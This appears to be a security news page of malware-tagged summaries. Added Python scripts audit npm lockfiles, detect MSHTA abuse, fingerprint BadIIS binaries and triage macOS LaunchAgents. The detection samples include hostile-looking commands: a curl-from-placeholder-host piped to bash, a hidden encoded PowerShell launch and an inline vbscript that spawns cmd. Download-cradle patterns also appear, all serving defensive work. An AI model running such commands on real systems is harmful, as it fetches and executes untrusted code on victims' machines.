ciso brief

All news with #malware tag

810 articles

Weekly Cyber Recap: Supply Chain and Active Flaws

⚡ This week's recap covers supply-chain compromises, resurfacing legacy bugs, and security tools themselves being targeted. Key incidents include a poisoned Nx Console VS Code extension leading to a GitHub breach, new active exploitation of Microsoft Defender flaws, and a nine-year-old Linux kernel privilege bug. Teams face increasing targeted phishing and widespread botnet scanning, while organizations scramble to patch critical CVEs and secure exposed services.

Chromium flaw allows persistent Service Worker abuse

🛡️ Chromium contains an unpatched vulnerability that lets attackers keep a Service Worker alive across restarts and execute JavaScript persistently. Reported by researcher Lyra Rebane, the bug abuses the Background Fetch API and a race that creates and aborts background fetches to evade UI visibility. Although some UI fixes were applied in 2023, the deeper issue—preventing indefinite Service Worker lifetimes—remains unresolved and can enable tracking, crypto mining, and browser-based bots.

The Art of Being Ungovernable: Career and Threats

📝 This edition of the Threat Source newsletter blends career reflection with active threat intelligence. The author argues that being ungovernable — intellectually curious and challenging — can accelerate growth when paired with the right peers. Cisco Talos also documents a Chinese-language BadIIS MaaS campaign, highlighting indicators like embedded demo.pdb strings and recommending IIS monitoring and updated endpoint detections.

Inside modern crypto drainers and spotting signs

🔍 Flare researchers analyzed ~700 underground posts on the "Lucifer DaaS" between Jan 2025 and early 2026 to reveal how modern crypto drainers evolved into professionalized, service-like platforms. The study highlights affiliate-driven distribution, automation, website cloning, Permit2 abuse, and multichain support, showing how DaaS lowers technical barriers and increases resilience. It also lists practical indicators to help users avoid wallet-draining scams.

Android Malware Signs Victims Up to Carrier Billing

📱 Zimperium's zLabs uncovered a 10-month Android malware campaign that used nearly 250 fake apps to enroll victims in premium carrier billing services across Malaysia, Thailand, Romania and Croatia. The operation, running from March 2025 to January 2026, included three variants that ranged from cookie- and SMS-harvesting to a fully automated subscription flow against DiGi. The most advanced variant abused Google's SMS Retriever API, forced traffic onto cellular, loaded hidden carrier billing pages and intercepted one‑time passwords. Users are advised to avoid sideloading apps, verify installed apps and review mobile bills for unexplained charges.

Mini Shai-Hulud Hits Hundreds of AntV npm Packages

🚨 The Mini Shai-Hulud worm resurfaced in a coordinated supply-chain wave that published 639 malicious versions across 323 npm packages tied to the AntV visualization ecosystem on 19 May, lasting roughly an hour. Analysis by Socket and updates from Microsoft show the payload added preinstall hooks executing an obfuscated Bun bundle to harvest cloud and CI secrets. Many affected packages are high-download dependencies and the compromised maintainer account held rights to over 500 packages. Responders should pin pre-19 May versions, rotate exposed credentials and audit GitHub for forged repository activity.

Webworm Adds EchoCreep and GraphWorm Using Discord

🔍 ESET researchers observed that China-aligned Webworm expanded its toolkit in 2025 with two new backdoors—EchoCreep and GraphWorm—that use Discord and the Microsoft Graph API for C2 communications. The actor increasingly favors proxy-based utilities and staging techniques such as SoftEther VPN and GitHub repositories to blend malicious traffic. Targets include government and enterprise entities across Asia and Europe, while older RATs appear to be abandoned.

SHub Reaper: macOS infostealer impersonates vendors

🛡️ SentinelOne researchers describe a new SHub variant named Reaper that targets macOS users by impersonating Apple, Google, and Microsoft across a single attack chain. The campaign uses fake security alerts and a ClickFix-style workflow to trick victims into running malicious AppleScript via the applescript:// URI handler and the Script Editor, bypassing Terminal paste protections. Reaper performs environment checks, drops payloads, and establishes persistence through LaunchAgents, then harvests credentials, Keychain items, cryptocurrency wallets, and messaging data. Defenders are advised to shift toward behavior-based detection and monitor Script Editor, osascript, and suspicious LaunchAgent activity.

GitHub Confirms Breach After Malicious VS Code Extension

🔒 GitHub confirmed that a third party accessed roughly 3,800 internal repositories after a likely “poisoned” Visual Studio Code extension was found on an employee device on May 19. The intrusion was claimed by the TeamPCP group, which posted on the Breached forum and linked the access to private source code. GitHub says it has contained the incident, removed the malicious extension, isolated the endpoint and prioritized rotation of critical secrets. The company will publish a more detailed report when its investigation is complete.

Tracking TamperedChef: Malicious Productivity Software

🔎 Unit 42 documents clusters of TamperedChef-style campaigns that trojanize productivity tools (e.g., PDF editors, calendars) to deliver stealers, RATs and proxies. These operations rely on malvertising-driven distribution, legitimate-looking sites, frequent binary rebuilds and code signing to evade detection. Unit 42 tracks three clusters (CL-CRI-1089, CL-UNK-1090, CL-UNK-1110) covering over 4,000 samples and 100 variants, and offers incident response assistance to organizations that find themselves compromised.

Microsoft Disrupts Malware Code-Signing Service Ring

🔒 Microsoft has disrupted the infrastructure behind a major malware code-signing service, seizing the group's site signspace[.]cloud and revoking more than 1,000 abused certificates. The company removed hundreds of attacker-controlled Azure virtual machines and linked the operation to a group it calls Fox Tempest. The service sold malware signing-as-a-service to ransomware affiliates, letting signed malicious installers evade Windows warnings and deploy backdoors, infostealers, and ransomware.

Microsoft Disrupts Malware-Signing Service Abusing Artifact

🔒 Microsoft says it disrupted a malware-signing-as-a-service operation that abused its Azure Artifact Signing platform to generate fraudulent short-lived code-signing certificates used by ransomware gangs and other cybercriminals. The actor, tracked as Fox Tempest, created over 1,000 certificates and hundreds of Azure tenants and subscriptions. Microsoft seized the signspace[.]cloud domain, took virtual machines offline, revoked certificates, and filed a lawsuit in the Southern District of New York.

npm supply-chain attack compromises AntV packages

🔒 The npm registry suffered a fast-moving supply-chain compromise on May 19 after attackers gained access to a high-privilege maintainer account (atool), pushing 637 malicious versions across 317 packages and infecting a large portion of the AntV namespace. The payload, a Mini-Shai-Hulud worm, steals npm/GitHub tokens and credentials and exfiltrates data to public GitHub repositories. AntV maintainers deleted infected versions, deprecated remaining packages, and advised users to audit, rotate credentials, and install known-safe releases.
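The two AntV items above both end with the same advice: find every installed package from the compromised scope, check whether the installed version was published inside the 19 May window or carries an install-time script, and pin back to the last version published before the wave. The script below is an added example of that audit and is not code from AntV, Socket or Microsoft. It reads a `package-lock.json` (lockfileVersion 3, whose entries carry `hasInstallScript`) and the per-version `time` map the npm registry returns for a package; the lockfile, the registry metadata, the cut-off timestamp and the version numbers are all constructed for the demo and do not identify real affected releases.

```python
"""Audit a package-lock.json (lockfileVersion 3) after an npm supply-chain
compromise: flag scoped packages whose installed version was published inside
the compromise window or that carry an install-time lifecycle script, and
propose the newest pre-window version to pin to.

Added example for the AntV / Mini Shai-Hulud incident; not code from AntV,
Socket or Microsoft.  Lockfile, registry "time" metadata, cut-off timestamp
and version numbers are constructed for the demo."""
import json
from datetime import datetime, timezone

# Assumed start of the publishing wave (the page gives the date, 19 May, not the time).
CUTOFF = datetime(2026, 5, 19, 0, 0, tzinfo=timezone.utc)


def _parse_time(stamp):
    """npm registry timestamps look like '2026-05-19T10:12:00.000Z'."""
    return datetime.fromisoformat(stamp.replace("Z", "+00:00"))


def package_name(lock_path):
    """'node_modules/@antv/g2/node_modules/@antv/util' -> '@antv/util'."""
    return lock_path.rsplit("node_modules/", 1)[1]


def scoped_packages(lock, scopes):
    """Yield (name, entry) for every installed package inside one of the scopes."""
    for path, entry in lock.get("packages", {}).items():
        if not path:  # "" is the root project, not a dependency
            continue
        name = package_name(path)
        if any(name.startswith(scope + "/") for scope in scopes):
            yield name, entry


def latest_before(times, cutoff):
    """Newest version whose publish time is strictly before the cutoff, or None."""
    published = [
        (version, _parse_time(stamp))
        for version, stamp in times.items()
        if version not in ("created", "modified")
    ]
    safe = [(v, t) for v, t in published if t < cutoff]
    return max(safe, key=lambda vt: vt[1])[0] if safe else None


def audit(lock, registry_time, scopes=("@antv",), cutoff=CUTOFF):
    """Return one finding per suspicious package; an empty list means nothing to act on."""
    findings = []
    for name, entry in scoped_packages(lock, scopes):
        version = entry.get("version")
        times = registry_time.get(name, {}).get("time", {})
        reasons = []
        stamp = times.get(version)
        if stamp is None:
            reasons.append("installed version absent from registry metadata (unpublished?)")
        elif _parse_time(stamp) >= cutoff:
            reasons.append(f"published {stamp}, inside the compromise window")
        if entry.get("hasInstallScript"):
            reasons.append("lifecycle install script present (preinstall/install/postinstall)")
        if reasons:
            findings.append({"package": name, "version": version,
                             "reasons": reasons, "pin_to": latest_before(times, cutoff)})
    return findings


# --- constructed sample data (versions are invented) -----------------------------
SAMPLE_LOCK = json.loads("""{
  "name": "demo-app", "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app",
         "dependencies": {"@antv/g2": "^5.3.0", "@antv/g6": "^4.8.0", "lodash": "^4.17.21"}},
    "node_modules/@antv/g2": {"version": "5.3.1", "hasInstallScript": true,
         "resolved": "https://registry.npmjs.org/@antv/g2/-/g2-5.3.1.tgz"},
    "node_modules/@antv/g2/node_modules/@antv/util": {"version": "3.3.11",
         "resolved": "https://registry.npmjs.org/@antv/util/-/util-3.3.11.tgz"},
    "node_modules/@antv/g6": {"version": "4.8.24",
         "resolved": "https://registry.npmjs.org/@antv/g6/-/g6-4.8.24.tgz"},
    "node_modules/lodash": {"version": "4.17.21",
         "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"}
  }}""")

# In practice this is the "time" object from GET https://registry.npmjs.org/<name>.
SAMPLE_REGISTRY_TIME = {
    "@antv/g2":   {"time": {"created": "2023-01-10T00:00:00.000Z",
                            "5.3.0": "2026-04-02T08:00:00.000Z",
                            "5.3.1": "2026-05-19T10:12:00.000Z"}},
    "@antv/util": {"time": {"created": "2023-01-10T00:00:00.000Z",
                            "3.3.10": "2026-03-15T09:30:00.000Z",
                            "3.3.11": "2026-05-19T10:20:00.000Z"}},
    "@antv/g6":   {"time": {"created": "2023-01-10T00:00:00.000Z",
                            "4.8.24": "2025-11-05T12:00:00.000Z"}},
}

if __name__ == "__main__":
    for f in audit(SAMPLE_LOCK, SAMPLE_REGISTRY_TIME):
        print(f"{f['package']}@{f['version']}: {'; '.join(f['reasons'])} -> pin to {f['pin_to']}")
```

Nested copies (the `@antv/util` under `@antv/g2` above) are the ones `npm ls` output tends to hide, which is why the walk is over lockfile paths rather than the root `dependencies` map. Pinning by publish time rather than by semver keeps the check correct even when the attacker bumped a patch version on an old release line.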

Trapdoor Android Ad-Fraud Chain Fuels Malvertising

🔍 Researchers at HUMAN's Satori Threat Intelligence team disclosed "Trapdoor," a multi-stage Android ad fraud and malvertising operation involving 455 malicious apps and 183 threat actor-owned C2 domains. The campaign used utility-like apps to trick users into installing secondary apps that launch hidden WebViews, load HTML5 cashout domains, and perform automated touch-fraud. At its peak Trapdoor generated about 659 million bid requests per day, drove over 24 million app installs—mostly from U.S. traffic—and Google removed the identified apps after disclosure.

Microsoft Disrupts Fox Tempest Malware Signing Network

🔒 Microsoft exposed and disrupted Fox Tempest, a criminal service selling malware-signing-as-a-service that helped disguise malware like Oyster, Lumma Stealer and Vidar as legitimate software. The Digital Crimes Unit used undercover personas to map the group's infrastructure and worked with hosting providers to sinkhole domains, disable virtual machines and suspend accounts. Microsoft filed a civil action in early May and unsealed a New York case on May 19.

Legacy MSHTA Utility Still Widely Abused by Malware

🛡️ Bitdefender reports that Microsoft’s MSHTA (Microsoft HTML Application Host), a remnant from Internet Explorer, is actively abused as a living-off-the-land binary in ongoing malware campaigns. Attackers use it to execute obfuscated HTA content, launch PowerShell, and fetch loaders and stealers such as CountLoader, LummaStealer, Amatera and PurpleFox. Campaigns rely on fake downloads, cracked apps, SEO-poisoned pages and Discord phishing to trick victims into executing payloads. Because MSHTA is Microsoft-signed and preinstalled, it remains implicitly trusted and attractive to adversaries.
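Because MSHTA is signed and preinstalled, blocking the binary outright is often not an option; what works is watching how it is invoked and what it spawns. The script below is an added example of that detection logic, not Bitdefender's detection content. It models events on Sysmon Event ID 1 fields (`Image`, `ParentImage`, `CommandLine`) serialised one per line as `key=value` pairs separated by `|`; the telemetry lines, process names and the `example.invalid` host are constructed for the demo.

```python
"""Flag MSHTA living-off-the-land activity in process-creation telemetry.

Added example, not Bitdefender's detection content.  Events are modelled on
Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the lines below
are constructed and the hostname uses a reserved test domain."""
import re
from pathlib import PureWindowsPath

# Interpreters and download tools mshta.exe has no business launching.
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                   "rundll32.exe", "regsvr32.exe", "certutil.exe", "curl.exe"}
# Parents that suggest a user was lured into running an HTA (fake download, chat client).
LURE_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "discord.exe",
                "outlook.exe", "winrar.exe", "7zfm.exe"}
# Remote HTA (http/https/UNC) or inline javascript:/vbscript: payload on the command line.
REMOTE_OR_INLINE = re.compile(r"(https?://|\\\\[^\\]+\\|javascript:|vbscript:)", re.IGNORECASE)
HTA_IN_USER_PATH = re.compile(r"\\(Temp|Downloads|AppData\\Local\\Temp)\\[^ ]+\.hta", re.IGNORECASE)
PS_CRADLE = re.compile(r"(-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|downloadstring|\biex\b)",
                       re.IGNORECASE)


def parse_line(line):
    """'Image=...|ParentImage=...|CommandLine=...' -> dict (command lines must not contain '|')."""
    return dict(field.split("=", 1) for field in line.rstrip("\n").split("|"))


def basename(path):
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the rule names that fire for one event (empty list = nothing)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "mshta.exe":
        if REMOTE_OR_INLINE.search(cmd):
            hits.append("mshta_remote_or_inline_script")
        if parent in LURE_PARENTS:
            hits.append("mshta_spawned_by_lure_app")
        if HTA_IN_USER_PATH.search(cmd):
            hits.append("mshta_hta_from_user_writable_path")
    if parent == "mshta.exe" and image in SCRIPT_CHILDREN:
        hits.append("mshta_spawned_interpreter")
        if PS_CRADLE.search(cmd):
            hits.append("mshta_child_obfuscated_or_download_cradle")
    return hits


def scan(lines):
    """Map the index of each flagged line to its rule hits."""
    findings = {}
    for i, line in enumerate(lines):
        hits = classify(parse_line(line))
        if hits:
            findings[i] = hits
    return findings


# Constructed telemetry: a remote HTA from a browser, its PowerShell child, an inline
# vbscript: payload, a vendor HTA that should stay quiet, and an HTA run from Downloads.
SAMPLE_LINES = [
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Program Files\Google\Chrome\Application\chrome.exe|CommandLine=mshta.exe https://download.example.invalid/setup.hta",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\mshta.exe|CommandLine=powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    r'Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe vbscript:CreateObject("Wscript.Shell").Run("cmd",0)(window.close)',
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe C:\Program Files\VendorApp\help.hta",
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe C:\Users\alice\Downloads\Crack_Setup.hta",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LINES).items():
        print(f"line {idx}: {', '.join(hits)}")
```

The fourth line is the control case: a locally installed vendor HTA launched from Explorer fires nothing, so the rules stay usable in environments where HTAs are still part of legitimate tooling. The parent/child pairing is the rule with the best signal, since MSHTA launching PowerShell with a hidden window and an encoded command is exactly the loader pattern the campaigns use.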

Agentic AI Drives Surge in Mobile App Cyberattacks

📈 Digital.ai's 2026 Application Security Threat Report found that 87% of monitored customer-facing apps were attacked in 2026, up sharply from 55% in 2022. The firm says agentic AI has lowered the skill and time required for threat actors to inspect code, generate exploits and adapt malware. Financial services, automotive and medical device apps were most targeted, and iOS attacks have nearly closed the gap with Android.

Tracking demo.pdb BadIIS: Commodity IIS Malware Toolset

🔍 Since 2024, Talos has tracked a BadIIS variant identified by consistent "demo.pdb" PDB paths across the Asia‑Pacific region and in isolated cases elsewhere. The PDB path patterns—including Chinese folder names, Administrator\Desktop build artifacts, and date‑based versioning—provide a reliable fingerprint for clustering and attribution. Talos recovered a 2022 builder that produces configured 32- and 64‑bit payloads, uses a unique 'lwxat' token as a C2 authentication check, applies single-byte XOR (key 0x3) obfuscation, and supports modular SEO‑fraud and proxy features. Evidence shows active development from Sept. 2021 through Jan. 2026.
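Both Talos items on this page (the Threat Source note and the demo.pdb write-up) turn on two static traits: the leftover PDB path and the XOR-0x3 string obfuscation with its `lwxat` token. The script below is an added example that fingerprints a binary on those two traits; it is not Talos's code and not the recovered builder. The sample blob is constructed here (a fake `RSDS` CodeView record followed by a PDB path and an XOR-encoded config string) and is not a real BadIIS module; the date and folder names in the path are invented.

```python
"""Fingerprint a BadIIS-style module on two traits: the leftover PDB path
(demo.pdb, Administrator\\Desktop build dirs, date-based versioning,
non-ASCII folder names) and strings hidden with a single-byte XOR (key 0x3),
including the 'lwxat' C2 token.

Added example, not Talos's code or the actual builder; SAMPLE_BLOB is
constructed and is not a real BadIIS binary."""
import re

XOR_KEY = 0x03
C2_TOKEN = b"lwxat"
# A PDB path embedded in a PE: drive letter, backslash path, ends in .pdb.
PDB_RE = re.compile(rb"[A-Za-z]:\\[\x20-\x7e\x80-\xff]{1,240}?\.pdb", re.IGNORECASE)


def xor_bytes(data, key=XOR_KEY):
    """Single-byte XOR; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def find_pdb_paths(blob):
    """All PDB paths in the blob, decoded byte-for-byte (latin-1) so nothing is lost."""
    return [m.group(0).decode("latin-1") for m in PDB_RE.finditer(blob)]


def pdb_traits(path):
    """Which of the clustering traits a PDB path shows."""
    traits = []
    if path.lower().endswith("demo.pdb"):
        traits.append("demo.pdb")
    if "\\administrator\\desktop\\" in path.lower():
        traits.append("Administrator\\Desktop build dir")
    if re.search(r"\\20\d{2}[-_.]?\d{2}[-_.]?\d{2}\\", path):
        traits.append("date-based versioning")
    # PE PDB paths are ANSI/MBCS, so a GBK-encoded Chinese folder shows up as high bytes.
    if any(ord(c) > 0x7E for c in path):
        traits.append("non-ASCII folder name (e.g. GBK-encoded Chinese)")
    return traits


def find_xor_strings(blob, token=C2_TOKEN, key=XOR_KEY):
    """Locate strings that contain `token` once XOR-decoded with `key`.

    The blob is searched for the XOR-encoded token; from each hit the string is
    decoded forward until the encoded NUL terminator (0x00 ^ key == key)."""
    encoded = xor_bytes(token, key)
    results = []
    offset = blob.find(encoded)
    while offset != -1:
        end = blob.find(bytes([key]), offset)
        if end == -1:
            end = len(blob)
        results.append((offset, xor_bytes(blob[offset:end], key).decode("latin-1")))
        offset = blob.find(encoded, offset + 1)
    return results


def scan(blob):
    paths = find_pdb_paths(blob)
    return {
        "pdb_paths": paths,
        "traits": {p: pdb_traits(p) for p in paths},
        "xor_strings": find_xor_strings(blob),
    }


# --- constructed sample blob: not a real BadIIS binary ----------------------------
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b"RSDS" + b"\x11" * 20                       # CodeView header, fake GUID + age
    + rb"C:\Users\Administrator\Desktop\badiis\2024-03-12\x64\Release\demo.pdb" + b"\x00"
    + b"\x00" * 16
    + xor_bytes(b"lwxat=1;mode=proxy") + bytes([XOR_KEY])   # XOR-obfuscated config + NUL
    + b"\x00" * 8
)

if __name__ == "__main__":
    print(scan(SAMPLE_BLOB))
```

Searching for the encoded form of a known token is cheaper and less noisy than brute-forcing every single-byte key over the whole file, and it recovers the rest of the string for free because the terminator is just the key byte. The same `pdb_traits` checks translate directly into a YARA rule if you prefer to ship them that way.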

INTERPOL Operation Ramz: 200+ Arrests and 53 Servers Seized

🔒 INTERPOL's Operation Ramz led to more than 200 arrests and the seizure of 53 servers used for phishing, malware, and online fraud, affecting at least 3,867 confirmed victims from nearly 8,000 intelligence packages. Authorities identified another 382 suspects across 13 MENA countries. INTERPOL partnered with private firms including Kaspersky, Group-IB, The Shadowserver Foundation, Team Cymru, and TrendAI to track malicious infrastructure. The operation disrupted phishing-as-a-service platforms, dismantled investment scam rings, and disabled malware-infected servers.

SHub 'Reaper' macOS Infostealer Spoofs Apple Updates

🔔 SentinelOne researchers disclosed a new SHub macOS infostealer variant, dubbed Reaper, that lures victims with fake app installers and uses the applescript:// URL scheme to launch a malicious AppleScript. The payload displays a bogus Apple security update, requests the macOS password, and executes a shell script that harvests browser data, crypto wallets, passwords, iCloud and Telegram artifacts, and files from Desktop and Documents. Reaper also persists via a LaunchAgent, hijacks wallet apps by replacing core files, and clears quarantine flags to evade Gatekeeper.
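Both SHub Reaper items above point at the same persistence artefact: a LaunchAgent in the user's `~/Library/LaunchAgents` that runs at login and hands control to `osascript`, a shell download cradle or a binary in a temp or hidden directory, sometimes under a label that pretends to be Apple's. The script below is an added example of triaging such plists and is not SentinelOne's code. The three plists are constructed for the demo (the download URL uses the reserved `example.invalid` domain), and `scan_user_agents` is the only part that touches the real filesystem.

```python
"""Triage LaunchAgent plists for the persistence pattern described in the
SHub/Reaper write-ups.  Added example, not SentinelOne's code; the plists
below are constructed and the URL uses a reserved test domain."""
import plistlib
import re
from pathlib import Path

SHELLS = {"sh", "bash", "zsh", "python3", "perl"}
# Temp dirs, hidden dirs and hidden Application Support folders are where droppers land.
SUSPICIOUS_DIRS = re.compile(
    r"^(/tmp/|/private/tmp/|/var/folders/|/Users/[^/]+/Library/Application Support/\.|/Users/[^/]+/\.)")
DOWNLOAD_CRADLE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh|osascript)\b")


def triage(plist_bytes, user_agent=True):
    """Return the findings for one LaunchAgent plist (empty list = looks ordinary)."""
    plist = plistlib.loads(plist_bytes)
    label = plist.get("Label", "")
    args = plist.get("ProgramArguments") or ([plist["Program"]] if "Program" in plist else [])
    program = args[0].rsplit("/", 1)[-1] if args else ""
    cmd = " ".join(args)
    findings = []
    if user_agent and label.startswith("com.apple."):
        findings.append("apple_label_in_user_launchagents")  # Apple does not install agents there
    if program in SHELLS:
        findings.append(f"runs_interpreter:{program}")
    if program == "osascript" or "osascript" in cmd:
        findings.append("invokes_applescript")
    if DOWNLOAD_CRADLE.search(cmd):
        findings.append("download_and_execute_cradle")
    if args and SUSPICIOUS_DIRS.search(args[0]):
        findings.append("program_in_temp_or_hidden_dir")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("run_at_load_and_keep_alive")
    return findings


def scan_user_agents(home=Path.home()):
    """Triage every plist in ~/Library/LaunchAgents; returns {path: findings} for flagged ones."""
    out = {}
    for p in (home / "Library" / "LaunchAgents").glob("*.plist"):
        try:
            hits = triage(p.read_bytes())
        except Exception as exc:  # malformed plist is itself worth a look
            hits = [f"unparseable:{exc.__class__.__name__}"]
        if hits:
            out[str(p)] = hits
    return out


# --- constructed plists ----------------------------------------------------------
_HEAD = (b'<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
         b'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n<plist version="1.0"><dict>\n')
_TAIL = b"</dict></plist>\n"

MALICIOUS_PLIST = _HEAD + b"""<key>Label</key><string>com.apple.security.update</string>
<key>ProgramArguments</key><array>
  <string>/bin/bash</string><string>-c</string>
  <string>curl -fsSL http://update.example.invalid/r.sh | bash; osascript -e 'display dialog "Update installed"'</string>
</array>
<key>RunAtLoad</key><true/>
<key>KeepAlive</key><true/>
""" + _TAIL

HIDDEN_BINARY_PLIST = _HEAD + b"""<key>Label</key><string>com.user.helper</string>
<key>ProgramArguments</key><array><string>/Users/alice/.cache/.helper</string></array>
<key>RunAtLoad</key><true/>
""" + _TAIL

BENIGN_PLIST = _HEAD + b"""<key>Label</key><string>com.vendorapp.updater</string>
<key>ProgramArguments</key><array>
  <string>/Applications/VendorApp.app/Contents/MacOS/updater</string><string>--check</string>
</array>
<key>StartInterval</key><integer>3600</integer>
""" + _TAIL

if __name__ == "__main__":
    for name, data in (("malicious", MALICIOUS_PLIST), ("hidden", HIDDEN_BINARY_PLIST), ("benign", BENIGN_PLIST)):
        print(name, triage(data))
    print(scan_user_agents())
```

The Apple-label rule is deliberately narrow: Apple's own agents live under `/System/Library/LaunchAgents`, so a `com.apple.*` label in the user's folder is a strong signal on its own. Pair this with the process monitoring the articles recommend (Script Editor, `osascript`), since an agent that only runs a legitimate-looking binary will pass this static triage.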